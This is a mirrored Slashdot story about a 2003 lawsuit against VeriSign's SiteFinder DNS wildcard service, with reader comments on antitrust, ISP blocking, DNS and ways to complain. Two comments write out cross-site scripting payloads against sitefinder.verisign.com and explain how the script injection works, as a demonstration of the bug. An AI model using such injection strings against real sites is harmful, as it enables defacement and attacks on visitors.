Slashdot Mirror

← Back to Stories (view on slashdot.org)

VeriSign Sued Over SiteFinder Service

Posted by CowboyNeal on from the to-all-good-things dept.

dmehus writes "It was only a matter of time, the pundits said, and they were right. Popular Enterprises, LLC., an Orlando, Florida based cybersquatting so-called 'search services' company, has filed a lawsuit in Orlando federal court against VeriSign, Inc. over VeriSign's controversial SiteFinder 'service.' While PopularEnterprises has had a dodgy history of buying up thousands of expired domain names and redirecting them to its Netster.com commercial "search services" site, the lawsuit is most likely a good thing, as it provides one more avenue to pursue in getting VeriSign to terminate SiteFinder. According to the lawsuit, the company contends alleges antitrust violations, unfair competition and violations of the Deceptive and Unfair Trade Practices Act. It asks the court to order VeriSign to put a halt to the service. VeriSign spokesperson Brian O'Shaughnessy said the company has not yet seen the lawsuit and that it doesn't comment on pending litigation."

20 of 403 comments (clear)

  1. Nice tactic. by NightSpots · · Score: 5, Informative

    Anti-trust was one of the very few tactics I didn't hear discussed as possible ways to stop Verisign.

    Arguing that they get for free what other companies must pay for is probably one of the easier arguments for win, since it proves itself nearly by definition.

    I applaud the jackass who pays to abuse typos. At least they've finally proven their worth.

    --

    --
    Use Vobbo for Video Blogs
    1. Re:Nice tactic. by nocomment · · Score: 5, Informative

      Don't forget the petition!!! Go sign it.

      http://www.petitiononline.com/icanndns/

      --
      /* oops I accidentally made a comment, sorry */
      /* http://allyourbasearebelongto.us */
  2. Most ISPs have blocked it by Amsterdam+Vallon · · Score: 4, Informative

    *Confirmed*: Adelphia has blocked VeriSign's new "service."

    Please reply to this and list names of fellow anti-VeriSign ISPs if your ISP has blocked this new "feature" as well.

    Thanks! I will enjoy analyzing this data.

    --

    Reply or e-mail; don't vaguely moderate. Ex-O'Reilly/MIT employee, now a full-time Google employee.
    1. Re:Most ISPs have blocked it by shostiru · · Score: 5, Informative
      We (mid-sized midwestern ISP) had our main nameservers (tinydns and djbdns) patched by 2AM the night this mess started, using the patches we found here. By a few hours later, I'd kludged the BIND source myself on a couple of other machines to return NXDOMAIN for anything in all three of the /24 netblocks in AS30060 (it worked fine, at least until the ISC patch was released). AFAIK our customers never even noticed the wildcarding.

      If you work in an ISP or other network infrastructure company, you know first-hand the degree of astonishment and rage that Verisign's move elicited; the fallout (spam filtration, security, network monitoring, etc.) goes far beyond HTTP. I don't think any of us slept much that night ... it only took a few hours to restore normal DNS behaviour, the remaining ten or so I spent in shock with my jaw scraping the floor.

      I've dealt with Verisign before (try getting decent documentation on the cybercash application library!) and knew they were greedy and stupid, but I wasn't counting on raw, unfettered eeeeeevil.

    2. Re:Most ISPs have blocked it by jms · · Score: 4, Informative

      Speakeasy appears to have blocked the "feature".

    3. Re:Most ISPs have blocked it by MattCohn.com · · Score: 3, Informative

      Comcast has also not blocked this.

  3. and the IEFT now has an Internet-Draft by shostiru · · Score: 5, Informative
    which I just found, draft-main-typo-wcard-02. Worth a look, as is the IETF mailing list archive. They're definitely aware of the problem. I particularly like following paragraph from the Internet-Draft:
    An error response that only works correctly in one situation would be as bad as an SMTP server that ignored its input and always produced a fixed sequence of responses: it would work in the one situation it was designed to expect, but cause chaos whenever presented with any other situation.
    sounds like the Snubby Mail Rejector, hmm?
  4. Re:I've never understood by marphod · · Score: 4, Informative

    How is it different from the pioneers getting 40 acres and a mule?

    First, a history lesson. '40 Acres and a Mule' wasn't a pioneer issue. What it is true that during the western rushes, various federal lands were put up for auction or claim by pioneers. The lands were not, however, specified to be 40 acres, but varied in size based on the territory and the specific land grant. For that matter, according to one of my HS Social Studies teachers (a dozen years ago), there were still federal lands for claim in parts of Alaska. That teacher was known to embellish the truth, so I won't put any varacity statement with that.

    '40 acres and a mule' were reparations for slaves in the south. They were instituted by a Northern (Union) general, during the aftermath of the civil war, and were later reveresed by an presidential executive order.

    So, in short, your parellel falls a little short. If the ICANN were to pass a ruling granting johnny-come-latelies names from vast corporate pools, that would be comprable.

    So, what's wrong with cybersquatting: Well, with the federal land grants, if you occupied and developed the federal lands for a specified period of time, they became yours. You could sell or otherwise use them as you wished. Here, cybersqquatters either are taking a developed item (debatably property) and using its good will and value for an interest contrary to the orginal owners. Which would be a violation of the land grants, so thats one point where your analogy fails.

    The other type of cybersquatter (who speculates on names or misspellings) is also abusing the good will of the originator, but may be a valid comparison. It is, however, annoying, to get redirected away from what you wanted because of a typo, and from the other side, a squatter who is taking an otherwise useful resource and making it near-useless is neither providing a valid service or generating good will.

  5. Don't badmouth Netster too bad by Tyler+Eaves · · Score: 5, Informative

    Yes, it's semi-sleazy, but they don't cybersquat.

    Timeline:

    1997 or so: I registered tylereaves.com, mainly for use in e-mail

    2000: I let the domain lapse, not really using it, and tired of paying $40 a year or so for it (Hey, registering was expensive in '97!)

    200?: Netster becomes the owner of tylereaves.com

    2003: I nicely ask for it back.
    2003: I get my domain back. They didn't even charge me the trasnfer fees.

    --
    TODO: Something witty here...
  6. Technical defense against hijacked domains by ODBOL · · Score: 5, Informative

    This is a good time to look at Bob Frankston's dotDNS proposal for a layer of reliable but meaningless domain names. dotDNS lookups can be made self-verifiable using public-key signatures, but without the costly chain of trust required by DNSSEC methods. The validity of a dotDNS binding can be verified easily by the querier, without relying at all on the server that provided the putative binding.

    dotDNS does not solve the whole problem, since any layer that translates from humanly meaningful names to dotDNS names is still vulnerable to hijacking. But the reliable and verifiable name bindings in dotDNS will make it *much* easier to switch name-resolution services when we are dissatisfied with their policies.

    dotDNS is a cheap and immediately deployable positive step toward fixing the DNS mess, requiring no approval by any central agency. It's time for a visionary sponsor to step forward and just do it.

    --
    Mike O'Donnell http://people.cs.uchicago.edu/~odonnell/
  7. Owning a domain you don't use by Animats · · Score: 4, Informative
    Owning a domain that wasn't in DNS used to be called a "lame delegation". At one time, about a decade ago, it was considered reasonable to garbage-collect domains that were lame delegations, but that was back before the Internet went commercial. Now you can have all the lame delegations you want.

    But why? There's no real market in domain names any more. Verisign tried to make one. GreatDomains used to have thousands of listings, and you'd see things like "Asked: $25,000. Bid: $20." Now Verisign only has "premium domains" on GreatDomains, ones like "record.com". There are only 66 domains for sale, and few sales.

  8. Re:Null space needs to remain null by kfg · · Score: 4, Informative

    "It makes me wonder if someone has a patent on silence yet?"

    No, there's too much prior art, but John Cage has a copyright on 4'33" of it.

    KFG

  9. Copy of the Lawsuit and More Details by dmehus · · Score: 3, Informative

    Full details of the lawsuit are available in this press release:
    home.businesswire.com/portal/site/google/index.jsp ?epi-content=GENERIC&newsId=20030918005730&newsLan g=en&beanID=478837757&viewID=news_view

    Copy of lawsuit:
    search.netster.com/about/lawsuit.asp

    Sorry, I forgot to include these links in my submission. Post away!

    Cheers,
    Doug

    --
    Doug Mehus http://doug.mehus.info/
  10. Re:Pert Peeve by kubrick · · Score: 3, Informative

    That requirement has been relaxed lately; they're pretty loose about it now, and auDA just require that it be 'related to your business operations'. Not quite the free-for-all that .com/.net/.org is...

    --
    deus does not exist but if he does
  11. Re:I'm not surprised... by Anonymous Coward · · Score: 3, Informative
    when the url is decoded it is
    http://sitefinder.verisign.com/lpc?url='//--></scr ipt>"//--></script>><font size="
    +3"><b>If <em>she</em> loves us then we <em>have</em> to be cool!<br>
    <img src="http://www.patrick.fm/boobies/boobies.php/tex t/VeriSign"><br>VeriSign! Hot
    babes love us! You should too!<br><br><br><br></font&g t ;|
    basically there is a point in the code where the cgi paramater url is assigned to a javascript variable. All that has to happen is close the js var declaration, html comment, and script tag.
    http://sitefinder.verisign.com/lpc?url="//--></scr ipt>malicious code<script>
    script at end opens another script tag for the original /script tag to work with, it also hides the rest of the javascript

    try these links

    Obligatory hello world example

    Micro$oft

    and a goatse.cx version

  12. Alexa by Anonymous Coward · · Score: 3, Informative

    Alexa Page Ranking, another insidious tool, lists Verisign Pagefinder as the number one Website in new Hits, up 1360 % on the week

    http://www.alexa.com/site/ds/movers_shakers

  13. Cross Site Scripting Bug by umofomia · · Score: 3, Informative
    http://www.";alert("fuckverisign");".com
    The parent post may be modded as "Funny" but this actually is a pretty serious cross-site scripting bug introduced by Verisign. This and the hard-coded SMTP replies bug show how little thought Verisign put into the ramafications of their changes. Seriously... if you're gonna hijack the Internet, at least do it right!!
  14. not quite by Anonymous Coward · · Score: 3, Informative
    Owning a domain that wasn't in DNS used to be called a "lame delegation".

    Not quite. Owning a domain is a separate issue from DNS. Owning a domain means you have an entry in a domain registry. It does not mean you have a DNS entry. Owning a domain means you have paid your money and signed up and that you have the right to have your domain added to the DNS.

    A lame delegation is something different. A lame delegation is when there are NS records that exist in the DNS, but they point to the address of a server that can't answer the queries for that domain. In contrast, if you have a domain that isn't in DNS, there is no NS record at all.

  15. how to call Verisign and complain by chongo · · Score: 3, Informative

    n addition to a number of already posted suggestions, I recommend that you call Verisign and file a complain:

    +1 703-742-0914 (worldwide)
    +1 888-642-9675 (toll free US/Canada)

    When you call, select:

    * 1 (purchase an product or renew an exist product)
    * then 7 (all other questions)

    I recommend that you be patient with the Verisign rep that answers the phone. That person may not fully understand the issue / problem, and they are unlikely to personally be responsible for the Verisign decision. Remember that you are objecting what Verisign as a company is doing. Don't yell at the rep. Be polite but firm.

    Ask Verisign to stop the wildcarding now. Explain why what they are doing is wrong (such as being unable to determine of a EMail message is being sent from a bogus / non-existent domain because thisdomaindoesnotexist.com resolves to 64.94.110.11).

    If you do business with Verisign now, tell them that you will switch vendors unless Verisign stops this practice in X weeks. (fill in the X)

    You might want to leave your phone number and request a callback. Anonymous complaints do not go as far.

    If you are in the US, you might want to contact your local member of congress and object about what Verisign is doing. Let Verisign know that you are doing this when you call.

    Yes, they might flush your complaint down /dev/null. But I suspect that pressure from all fronts might help. I have been told (off the record) that some people within Verisign are not happy with their wildcarding. Complaints get logged into a database that these people can review. Your complaints, in volume, might help those folks make a stronger case against top-level wildcarding.

    --
    chongo (was here) /\oo/\
  16. how to complain about Verisign to ICANN by chongo · · Score: 4, Informative
    In addition to signing the:
    online petition

    you can file a complaint about Verisign to ICANN by using their:

    Registrar Problem Report Form
    --
    chongo (was here) /\oo/\